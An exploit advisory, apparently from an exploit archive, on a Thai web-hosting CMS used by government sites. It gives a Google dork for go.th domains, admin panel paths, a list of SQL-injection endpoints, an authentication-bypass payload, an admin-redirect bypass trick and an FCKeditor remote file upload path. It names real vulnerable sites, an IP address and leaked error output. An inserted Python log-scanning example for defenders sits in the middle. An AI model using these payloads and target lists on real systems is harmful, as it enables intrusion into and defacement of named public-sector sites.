TimesMedia.Co.Th WebHosting ThailandGov Multiple Vulnerabilities

Author: KingSkrupellos , Published: 09-10-2018
#################################################################################################

# Exploit Title : TimesMedia.Co.Th WebHosting ThailandGov Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/10/2018
# Vendor Homepage : timesmedia.co.th/web58/index.php
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# CopyRight © 2015 www.timesmedia.co.th All Rights Reserved

# Google Dork :

inurl:''/select_news.php?news_id='' site:go.th

# Note : Thailand Government WebSites are vulnerable.

# Admin Control Panel Login Path :

/login_form.php
/admin.php

# SQL Injection Exploits :

/contact.php?content_id=[SQL Injection]

/base.php?content_id=[SQL Injection]

/council.php?content_id=[SQL Injection]

/history.php?content_id=[SQL Injection]

/person.php?content_id=[SQL Injection]

/vision.php?content_id=[SQL Injection]

/memorable.php?content_id=[SQL Injection]

/travel.php?content_id=[SQL Injection]

/stucture.php?content_id=[SQL Injection]

/admin1.php?content_id=[SQL Injection]

/otop.php?content_id=[SQL Injection]

/news.php?id_type=[SQL Injection]

/select_news.php?news_id=[SQL Injection]

/policy.php?content_id=[SQL Injection]

/office.php?content_id=[SQL Injection]

/data.php?content_id=[SQL Injection]

/strategy_plan.php?content_id=[SQL Injection]

/activity/user_select_photo.php?news_id=[SQL Injection]

/vdo/user_select_youtube.php?yt_id=[SQL Injection]
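For site operators reviewing their own logs, the check below flags requests in which one of the parameters listed above carries anything other than a plain integer. It is an added example, not part of the original advisory or the vendor's code; the combined log format, the sample lines and the assumption that every listed parameter is a numeric row ID are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory's list. Treating every one of them
# as an integer row ID is an assumption based on the page's sample URLs.
ID_PARAMS = {"content_id", "news_id", "id_type", "yt_id"}

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges, no real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2018:09:15:02 +0700] "GET /policy.php?content_id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2018:09:15:40 +0700] "GET /policy.php?content_id=1%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Oct/2018:09:15:44 +0700] "GET /select_news.php?news_id=410%27 HTTP/1.1" 200 790',
    '192.0.2.10 - - [10/Oct/2018:09:16:10 +0700] "GET /news.php?id_type=4&page=2 HTTP/1.1" 200 6044',
    '203.0.113.5 - - [10/Oct/2018:09:17:31 +0700] "GET /vdo/user_select_youtube.php?yt_id=7%2527 HTTP/1.1" 200 640',
]

def suspicious_params(target):
    """Return (name, decoded value) for ID parameters that are not plain integers."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(n, v) for n, v in pairs
            if n in ID_PARAMS and not re.fullmatch(r"[0-9]{1,10}", v)]

def scan(lines):
    """Return (client, path, parameter, decoded value, status) per finding."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format access line
        client, target, status = m.groups()
        path = urlsplit(target).path
        for name, value in suspicious_params(target):
            findings.append((client, path, name, value, int(status)))
    return findings

def hits_per_client(findings):
    """Count findings per client address to separate probing from stray typos."""
    counts = {}
    for client, *_ in findings:
        counts[client] = counts.get(client, 0) + 1
    return counts

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allow-list (digits only) is what the application should enforce on these parameters before they reach a query, in addition to using parameterized statements.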

Unauthorized Topic Add without Administrator Permission Exploit =>

TARGET/webboard/new.php?category=webboard

TARGET/webboard/index.php?category=webboard

Note : Use the Mozilla Firefox Open Link No Redirect Extension to Bypass the Admin Control Panel

Download and Install it in your Browser =>

addons.mozilla.org/en-US/firefox/addon/noredirect/

addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/

If that does not work, try one of the SQL Authentication Exploit Payloads below =>

Admin Username : anything' OR 'x'='x

Admin Password : anything' OR 'x'='x

Directory File Path : /fileupload/....

Directory File Path : /activity/images/....

Remote File Upload Exploit =>

TARGET/admin/FCKeditor/editor/filemanager/upload/test.html

/UserFiles/....

Note : Only Thailand Government WebSites [ go.th ] are vulnerable for this issue.

#################################################################################################

# Example Vulnerable Sites => Vulnerable IP Address => 61.19.250.25

Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php

makluakao.go.th/webboard/index.php?category=webboard => [ Proof of Concept ] => archive.is/azGk4

phoklang.go.th/news.php?id_type=4%27 => [ Proof of Concept for RFU Vuln ] => archive.is/8wk57

banthan.go.th/policy.php?content_id=1%27 => [ Proof of Concept for SQL Inj ] => archive.is/lkrrB

# SQL Database Error =>

Warning: simplexml_load_file(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/huanong/domains/huanong.go.th/public_html/egp.php on line 137

Warning: simplexml_load_file(http://process3.gprocurement.go.th/EPROCRssFeedWeb/egpannouncerss.xml?deptId=6401010&anounceType=W0): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/huanong/domains/huanong.go.th/public_html/egp.php on line 137

Warning: simplexml_load_file(): I/O warning : failed to load external entity "http://process3.gprocurement.go.th/EPROCRssFeedWeb/egpannouncerss.xml?deptId=6401010&anounceType=W0" in /home/huanong/domains/huanong.go.th/public_html/egp.php on line 137

Error: Cannot create object

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/banthan/domains/banthan.go.th/public_html/policy.php on line 229

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/banthan/domains/banthan.go.th/public_html/policy.php on line 233

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/phoklang/domains/phoklang.go.th/public_html/news.php on line 129

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/phoklang/domains/phoklang.go.th/public_html/news.php on line 150

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/phoklang/domains/phoklang.go.th/public_html/news.php on line 187

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/phoklang/domains/phoklang.go.th/public_html/news.php on line 198

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
